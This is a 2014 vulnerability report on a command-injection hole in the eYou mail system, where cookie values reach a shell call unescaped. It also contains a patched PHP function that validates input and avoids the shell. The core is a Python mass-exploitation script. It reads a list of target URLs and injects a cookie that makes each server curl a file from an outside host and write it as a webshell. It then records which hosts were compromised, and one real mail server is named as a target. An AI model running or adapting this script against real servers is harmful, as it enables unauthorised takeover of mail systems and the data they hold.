
Command execution vulnerability in the eYou (亿邮) mail system allows mass Getwebshell

2014-06-10 18:55

user/storage_fold_explore.php

<?php
/**
 * User network storage directory listing
 *
 * This page shows the logged-in mailbox user's network storage directory list; after a directory is selected, mail attachments are saved to it.
 *
 * @author FengHui <fenghui@eyou.net>
 * @copyright 199902008 eYou.net
 * @version storage_explore.php 2008/11/12
 */
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');

// SKIN, UID and DOMAIN are read from the client-supplied cookie
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
// $uid and $domain reach getUserDirPath() without any validation
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$file_name = htmlspecialchars(get('file'));
$att = htmlspecialchars(get('att'));
?>



getUserDirPath() is defined in /inc/function.php.

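function getUserDirPath($uid, $domain) {
    // $uid and $domain are interpolated into the command string unescaped
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    // the backtick operator runs the string through the shell
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}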





Proof of vulnerability:

Exploit code:

__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse

def Getwebshell(url):
    url=url.strip()
    header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
    try:
        request=urllib2.Request(url,None,headers=header)
        rep=urllib2.urlopen(request)
    except:
        pass
    Indentified(url)

def Readfile(filen):
    fp=open(filen,'r')
    for url in fp:
        if url!='':
            Getwebshell(url)

def Indentified(url):
    url=url[:-19]
    url=url+"test.php"
    try:
        f=urllib.urlopen(url).getcode()
        if f==200:
            fp=open("shell.txt","w+")
            fp.write(url+"\n")
            fp.close()
    except:
        pass

Readfile("url.txt")



url.txt contains entries of the form http://mail.bjsasc.com/user/storage_fold_explore.php




Fix:

You know what to do...
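One way to close the hole in getUserDirPath(), as an added example that is not eYou's code or patch: validate the cookie-derived UID and DOMAIN against an allowlist, then run hashid with an argument vector so no shell parses them. The names getUserDirPathSafe, isValidUid and isValidDomain, the allowed character sets and the PHP 7.4+ requirement are assumptions.

```php
<?php
// Added example, not eYou's patch. Assumes PHP 7.4+ (array form of proc_open).
const HASHID_BIN = '/var/eyou/sbin/hashid'; // binary path as shown on the page

// Assumption: a UID is a mailbox local part. The first character must be
// alphanumeric so a value can never be parsed by hashid as an option.
function isValidUid(string $uid): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $uid) === 1;
}

// Assumption: DOMAIN is a hostname or a dotted IPv4 address.
function isValidDomain(string $domain): bool
{
    return strlen($domain) <= 253
        && preg_match('/\A[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/', $domain) === 1;
}

// Returns the user directory path, or null if input is rejected or hashid fails.
function getUserDirPathSafe(string $uid, string $domain): ?string
{
    if (!isValidUid($uid) || !isValidDomain($domain)) {
        return null; // reject outright instead of trying to sanitise
    }
    if (!is_executable(HASHID_BIN)) {
        return null;
    }
    // Array form: hashid is executed directly with an argument vector, so
    // the cookie-derived values are never interpreted by a shell.
    $proc = proc_open([HASHID_BIN, $uid, $domain], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $path = trim(stream_get_contents($pipes[1]));
    fclose($pipes[1]);
    proc_close($proc);
    return $path !== '' ? $path : null;
}

// Constructed sample cookie values: two ordinary pairs, then values carrying
// shell metacharacters or a leading hyphen.
$samples = [['1', '127.0.0.1'], ['alice.w', 'example.com'],
            ['1|id', '127.0.0.1'], ['1', 'example.com;id'], ['-h', 'example.com']];
foreach ($samples as [$uid, $domain]) {
    $ok = isValidUid($uid) && isValidDomain($domain);
    printf("%-10s %-16s %s\n", $uid, $domain, $ok ? 'accepted' : 'rejected');
}
```

On PHP versions older than 7.4, the same allowlist combined with escapeshellarg() on each argument is the fallback.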


Source: www.wooyun.org/bugs/wooyun-2014-058531
